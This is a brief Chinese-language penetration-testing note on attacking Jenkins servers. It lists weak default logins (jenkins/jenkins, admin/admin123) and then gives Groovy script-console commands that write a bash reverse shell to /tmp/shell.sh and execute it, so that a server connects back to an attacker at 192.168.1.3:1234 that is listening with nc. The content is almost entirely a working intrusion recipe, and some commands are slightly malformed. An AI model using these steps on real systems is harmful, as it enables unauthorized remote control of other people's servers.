web中间件漏洞-Jenkins漏洞-弱口令、反弹shell
Jenkins弱口令
默认用户一般为jenkins/jenkins


使用admin/admin123登陆成功

Jenkins反弹shell


格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句
new File(“/tmp/shell.sh”).write(‘bash -i >& /dev/tcp/192.168.1.3/1234 0>&1’

println “ls-al/tmp/shell.sh”.execute().text

攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text

